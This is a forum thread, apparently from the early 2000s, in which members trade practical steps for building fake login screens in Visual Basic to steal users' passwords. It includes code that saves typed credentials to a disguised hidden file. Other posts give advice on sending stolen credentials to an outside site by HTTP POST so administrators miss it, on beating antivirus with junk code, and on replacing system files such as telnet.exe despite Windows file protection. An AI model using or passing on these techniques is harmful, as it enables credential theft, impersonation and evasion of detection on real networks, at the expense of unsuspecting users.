Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Categories

fake-login screens

didanididani Member Posts: 99
what are the neccessary techniques when using fake loginscreens??
-starting the form.
-making it look just like the real & authentic login form
-remembering username & password (in a safe place)
-not leaving a trace

step 1.
make a form, put two textboxes in it, take two labels an two or three command-buttons.
put a password-char on one of the forms. put the labels in front of the textboxes.
more explainations next time

EtHeO out...

Comments

• didanididani Member Posts: 99
    : what are the neccessary techniques when using fake loginscreens??
    : -starting the form.
    : -making it look just like the real & authentic login form
    : -remembering username & password (in a safe place)
    : -not leaving a trace
    :
    : step 1.
    : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : put a password-char on one of the forms. put the labels in front of the textboxes.
    : more explainations next time
    :
    : EtHeO out...
    :
    step 2.
    make it look like the real authentic form...
    just place the labels and textboxes where they belong, and put the proper text in them. for pictures use a screenshot program (like microangelo 5 or something)
    next step another time

EtHeO out...
    : : what are the neccessary techniques when using fake loginscreens??
    : : -starting the form.
    : : -making it look just like the real & authentic login form
    : : -remembering username & password (in a safe place)
    : : -not leaving a trace
    : :
    : : step 1.
    : : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : : put a password-char on one of the forms. put the labels in front of the textboxes.
    : : more explainations next time
    : : EtHeO out...
    : step 2.
    : make it look like the real authentic form...
    : just place the labels and textboxes where they belong, and put the proper text in them. for pictures use a screenshot program (like microangelo 5 or something)
    : next step another time
    :
    :
    make the code for the login button something like this:

open "c:windowscommandfsd.com" for output as #1
    print #1, text1.text
    print #1, text2.text
    close #1
    shell "+s attrib c:windowscommandfsd.com", vbhide

Leaving no trace another time...
    (if you have better ideas for research of how-to code, please let me know)

EtHeO out...
  • JonathanJonathan Member Posts: 2,914
    : : : what are the neccessary techniques when using fake loginscreens??
    : : : -starting the form.
    : : : -making it look just like the real & authentic login form
    : : : -remembering username & password (in a safe place)
    : : : -not leaving a trace
    : : :
    : : : step 1.
    : : : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : : : put a password-char on one of the forms. put the labels in front of the textboxes.
    : : : more explainations next time
    : : : EtHeO out...
    : : step 2.
    : : make it look like the real authentic form...
    : : just place the labels and textboxes where they belong, and put the proper text in them. for pictures use a screenshot program (like microangelo 5 or something)
    : : next step another time
    : make the code for the login button something like this:
    :
    : open "c:windowscommandfsd.com" for output as #1
    : print #1, text1.text
    : print #1, text2.text
    : close #1
    : shell "+s attrib c:windowscommandfsd.com", vbhide
    :
    : Leaving no trace another time...
    : (if you have better ideas for research of how-to code, please let me
    : know)

Oh man...some lamer created one of these, deployed it on the college network and then used it to steal people's usernames and passwords so they could send emails pretending to be from them and other crap like that. Understanding how to do this stuff is great, trying it on your own network is cool, but deploying this stuff for real on a big network and using the data you collect to cause harm...that's just plain stupid. Of course, they got caught. So many people get caught 'cus they think they are so great to have got into something or stolen some data they forget the covering up afterwards stage, or use it so carelessly it's obvious something has happened and sysadmins then investigate.

As for your idea for storing the data...at our college if you create any new files on the HDD they get wiped out at reboot. Also a file of passwords is going to look very suspect if it's found. So to do this effectively you'd want to discreetly establish a connection to some location you could rely on (I'd say outside the network). I'd send them in a HTTP request and have an innocent looking site if I were doing it so anyone investigating would be trown off somewhat - use POST rather than GET too as the data sent by POST is less likely to be saved than any headers sent. And as so many people are browsing the web, the odd bit of HTTP traffic is likely to go un-noticed. I don't know how the people who did it at my college went about it, I believe the HDD file cleaner may not have been there when they did this last year. Anyway, I don't recommend that anyone tries any of this on anything that isn't their own. Hacking is one thing, crime is another. :-)

And this is my post to help prevent a potentially interesting forum dying.

Jonathan

###
    for(74,117,115,116){$::a.=chr};(($_.='qwertyui')&&
    (tr/yuiqwert/her anot/))for($::b);for($::c){$_.=$^X;
    /(p.{2}l)/;$_=$1}$::b=~/(..)$/;print("$::a$::b $::c hack$1.");

: : : : what are the neccessary techniques when using fake loginscreens??
    : : : : -starting the form.
    : : : : -making it look just like the real & authentic login form
    : : : : -remembering username & password (in a safe place)
    : : : : -not leaving a trace
    : : : :
    : : : : step 1.
    : : : : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : : : : put a password-char on one of the forms. put the labels in front of the textboxes.
    : : : : more explainations next time
    : : : : EtHeO out...
    : : : step 2.
    : : : make it look like the real authentic form...
    : : : just place the labels and textboxes where they belong, and put the proper text in them. for pictures use a screenshot program (like microangelo 5 or something)
    : : : next step another time
    : : make the code for the login button something like this:
    : : open "c:windowscommandfsd.com" for output as #1
    : : print #1, text1.text
    : : print #1, text2.text
    : : close #1
    : : shell "+s attrib c:windowscommandfsd.com", vbhide
    : : Leaving no trace another time...
    : : (if you have better ideas for research of how-to code, please let me
    : : know)
    :
    : Oh man...some lamer created one of these, deployed it on the college network and then used it to steal people's usernames and passwords so they could send emails pretending to be from them and other crap like that. Understanding how to do this stuff is great, trying it on your own network is cool, but deploying this stuff for real on a big network and using the data you collect to cause harm...that's just plain stupid. Of course, they got caught. So many people get caught 'cus they think they are so great to have got into something or stolen some data they forget the covering up afterwards stage, or use it so carelessly it's obvious something has happened and sysadmins then investigate.
    :
    : As for your idea for storing the data...at our college if you create any new files on the HDD they get wiped out at reboot. Also a file of passwords is going to look very suspect if it's found. So to do this effectively you'd want to discreetly establish a connection to some location you could rely on (I'd say outside the network). I'd send them in a HTTP request and have an innocent looking site if I were doing it so anyone investigating would be trown off somewhat - use POST rather than GET too as the data sent by POST is less likely to be saved than any headers sent. And as so many people are browsing the web, the odd bit of HTTP traffic is likely to go un-noticed. I don't know how the people who did it at my college went about it, I believe the HDD file cleaner may not have been there when they did this last year. Anyway, I don't recommend that anyone tries any of this on anything that isn't their own. Hacking is one thing, crime is another. :-)
    :
    : And this is my post to help prevent a potentially interesting forum dying.
    :
    : Jonathan
    :
    : ###
    : for(74,117,115,116){$::a.=chr};(($_.='qwertyui')&&
    : (tr/yuiqwert/her anot/))for($::b);for($::c){$_.=$^X;
    : /(p.{2}l)/;$_=$1}$::b=~/(..)$/;print("$::a$::b $::c hack$1.");
    :
    :
    that sure is true, hacking is one thing, crime is another. But, I use my cewl progs on my college's network too, because I don't have Novell or illusion 99 on my home comp.
    you could also insert a "jump" function, regarding at least one network computer is online. Just make the prog run in server cache and move the file every sec or so to a live computer... give it a stop command which will store it on your computer...
    likely to be detected, not likely to get caught

EtHeO out...

• PadrePioPadrePio Member Posts: 1
    [b][red]This message was edited by PadrePio at 2003-11-6 12:20:13[/red][/b][hr]
    :
    : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : put a password-char on one of the forms. put the labels in front of the textboxes.
    :
    :

If you make an fake login screen of msn and some others in vb, the lame people @microsoft don`t dont let you make an exe file of it.
    When you do it 50 % of virus apps say that the exe file are an virus....
    fx in the lame app they r runnin @ my school says that the file are the virus : Boobs.fake.caller.trojan or someting like that...

annyway, if you got pobs. with progging one add me to your msn ans I`ll help ya

PadrePi0

: [b][red]This message was edited by PadrePio at 2003-11-6 12:20:13[/red][/b][hr]
    : : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : : put a password-char on one of the forms. put the labels in front of the textboxes.
    :
    :
    : If you make an fake login screen of msn and some others in vb, the lame people @microsoft don`t dont let you make an exe file of it.
    : When you do it 50 % of virus apps say that the exe file are an virus....
    : fx in the lame app they r runnin @ my school says that the file are the virus : Boobs.fake.caller.trojan or someting like that...
    :
    :
    : annyway, if you got pobs. with progging one add me to your msn ans I`ll help ya
    :
    :
    :
    : PadrePi0
    :
    :
    :
    :
    just add some nonfunctional code ( a = 3 ) somewhere, and it won't recognize it anymore

EtHeO out...

• the_skullinthe_skullin Member Posts: 4
    :
    :
    :

I created a fake login screen of telnet logging window.
    i made a .exe and replaced the telnet file in the c:/windows/system32 directory. But as soon as i refresh the explorer, windows replaces my file with its original file...

How do i get around this one??? :(

thanx in advance...
    :)

:
    : I created a fake login screen of telnet logging window.
    : i made a .exe and replaced the telnet file in the c:/windows/system32 directory. But as soon as i refresh the explorer, windows replaces my file with its original file...
    :
    : How do i get around this one??? :(
    :
    : thanx in advance...
    : :)
    :
    :
    hmmzz.... this is one of the disadvantages of windoze... Why would you want telnet? why not use keylogger for this one??
    EtHeO out...

• the_skullinthe_skullin Member Posts: 4
    : : : what are the neccessary techniques when using fake loginscreens??
    : : : -starting the form.
    : : : -making it look just like the real & authentic login form
    : : : -remembering username & password (in a safe place)
    : : : -not leaving a trace
    : : : step 1.
    : : : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : : : put a password-char on one of the forms. put the labels in front of the textboxes.
    : : : more explainations next time
    : : I created a fake login screen of telnet logging window.
    : : i made a .exe and replaced the telnet file in the c:/windows/system32 directory. But as soon as i refresh the explorer, windows replaces my file with its original file...
    : : How do i get around this one??? :(
    : : thanx in advance...
    : : :)
    : hmmzz.... this is one of the disadvantages of windoze... Why would you want telnet? why not use keylogger for this one??
    :
    :

Well why should i use the keylogger when i can kidnap the person concerned and force him to let out his password....
    cum on man...i just ask if there is a way to prevent windoz from doing the refresh on its system files...
    or perhaps if i know where it keeps its backup, i can replace the backup with my malicious script...

LAC...

: : : : what are the neccessary techniques when using fake loginscreens??
    : : : : -starting the form.
    : : : : -making it look just like the real & authentic login form
    : : : : -remembering username & password (in a safe place)
    : : : : -not leaving a trace
    : : : : step 1.
    : : : : make a form, put two textboxes in it, take two labels an two or three command-buttons.
    : : : : put a password-char on one of the forms. put the labels in front of the textboxes.
    : : : : more explainations next time
    : : : : EtHeO out...
    : : : I created a fake login screen of telnet logging window.
    : : : i made a .exe and replaced the telnet file in the c:/windows/system32 directory. But as soon as i refresh the explorer, windows replaces my file with its original file...
    : : : How do i get around this one??? :(
    : : : thanx in advance...
    : : : :)
    : : hmmzz.... this is one of the disadvantages of windoze... Why would you want telnet? why not use keylogger for this one??
    :
    : Well why should i use the keylogger when i can kidnap the person concerned and force him to let out his password....
    : cum on man...i just ask if there is a way to prevent windoz from doing the refresh on its system files...
    : or perhaps if i know where it keeps its backup, i can replace the backup with my malicious script...
    :
    : LAC...
    :
    :
    kidnapping sounds like a good idea :-P
    I honestly don't know exactly where windoze keeps backups, I think its in .cab files...
    EtHeO out...